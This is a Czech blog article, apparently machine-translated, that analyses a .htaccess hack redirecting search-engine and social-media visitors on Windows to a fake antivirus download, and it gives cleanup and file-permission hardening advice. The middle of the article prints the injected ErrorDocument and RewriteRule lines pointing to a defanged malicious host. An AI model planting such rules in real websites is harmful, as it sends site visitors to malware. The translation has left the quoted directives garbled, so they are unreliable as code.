Malware / Virus - .htaccess „přepisuje“ a přesměruje

Nová forma viru kteří vidí, že neví, velmi silně ovlivňuje weby hostované na nespolehlivé servery kde mezi nimi lze „vidět“ uživatelské účty / účty subdomén. Konkrétně jsou všechny hostitelské účty vloženy do složky „vhosts“, A právo na psaní uživatelská složka „vhosts“ dostává běžný uživatel… prodejce ve většině situací. Je to typická metoda webových serverů, které nepoužívají WHM / cPanel.

Akce .Htaccess virus - hack .htaccess

Virus ovlivňuje soubory . Htaccess oběť místo. Řádky, které znějí / Směrnice na přesměrování návštěvníků (pocházejí z webů a portálů s vysokým provozem yahoo, msn, google, facebook, yaindex, twitter, myspace atd.) na některé weby, které nabízejí "antivirus". Je to o falešný antivirus, O kterém jsem psal v úvodu .

To je, jak . Htaccess vliv: (nemá přístup k obsahu řádky níže uvedených odkazů)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * HotBot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vyhledávání. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Ti, kteří používají WordPress najdou tyto řádky v souboru . Htaccess z public_html. Kromě toho, virus vytvoří. Htaccess ve stejné složce wp-content.

*K dispozici jsou také k situacím, ve kterých se objeví místo peoriavascularsurgery.com dns.thesoulfoodcafe.com nebo jiné adresy.

Co dělá tento virus.

Po přesměrování, je návštěvník přivítal s otevřenou náručí zprávou:

Varování!
Váš počítač obsahuje různé známky přítomnosti virů a malwarových programů. Váš systém vyžaduje okamžitou antivirovou kontrolu!
System Zabezpečení provede rychlou a bezplatnou kontrolu virů a škodlivých programů v počítači.

1 malware

Bez ohledu na to, které tlačítko stiskneme, dostaneme se na stránku "Můj počítač", Vytvořeno napodobovat XP designu. Tady začíná automaticky „proces skenování“, na jehož konci zjistíme, že „jsme infikováni“.

2 malware

Po klepnutí na tlačítko OK nebo Storno, začne downloadSoubor je setup.exe. Tento setup.exe je falešný anti virus ovlivňující systém. Nainstalujte malware šířit další napadené odkazy, a kromě nich anti-virus software (také falešné), že oběť je pozvána ke koupi.
Ti, kteří již kontaktovali virus může použít tento formulář . Doporučuje se také, aby naskenovat celý HDD. Doporučit Kaspersky Internet Security nebo Kaspersky Anti Virus.

Tento typ viru ovlivňuje Návštěvní OS operační systémy Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Dosud nebyly známy žádné případy infekce operačních systémů Windows Zrak ano Windows 7.

Jak můžeme odstranit tento virus. Htaccess na serveru a jak, aby se zabránilo infekci.

1. Analyzovat podezřelé soubory a mazání kódů. Chcete-li zajistit, že soubor není ovlivněna pouze . Htaccess byste měli analyzovat všechny soubory . Php si . Js.

2. Přepsat soubor. Htaccess a nastavte chmod 644 nebo 744 s přístup pro zápis pouze vlastníka uživatele.

3. Když vytvoříte hostování v úvahu pro webové stránky ve složce / Home nebo / Webroot Tím se automaticky vytvoří složku, která má často uživatelské jméno (uživatel pro cPanel, ftpAtd.). Chcete-li zabránit psaní dat a přenosu virů z jednoho uživatele na jiného, ​​se doporučuje, aby každý uživatel složku, kterou chcete nastavit:

chmod Je uvedeno 644 nebo 744, 755 – 644.
chown -R uživatelské jméno název_složky.
chgrp-R nume_user nume_folder

ls-all způsoby, jak zkontrolovat, zda byly provedeny správně. By se měly objevit něco takového:

drwx - x - x 12 dinamics dinamics 4096 6. května 14:51 dinamics /
drwx - x - x 10 duran duran 4096 7. března 07:46 duran /
drwx - x - x 12 zkumavka zkumavka 4096 29. ledna 11:23 zkumavka /
drwxr-xr-x 14 express express 4096 26. února 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19. května 01:09 ezo /
drwx - x - x 9 farma farma 4096 19. prosince 22:29 farma /

Pokud jeden z výše bude userele FTP Infikované souboryTo nemůže odeslat virus jiného uživatele hostitele. Je minimální bezpečnostní opatření k ochraně účtů hostované na webovém serveru.

Společné prvky oblastí postižených tímto virem.

Všechny ovlivněné domény přesměrovávají návštěvníky na stránky, které obsahují název domény „/main.php? s = 4 & H".

Tento "virus. htaccess„Ovlivňuje jakýkoli typ CMS (joomla, WordPress, phpBBAtd.) pomocí . Htaccess

.htaccess Virus Hack & Redirect.

Zakladatel a editor Stealth Settings, od roku 2006 do současnosti. Zkušenosti s operačními systémy Linux (Zejména CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

jak na to » AntiVirus a zabezpečení » Malware / Virus - .htaccess „přepisuje“ a přesměruje
Zanechat komentář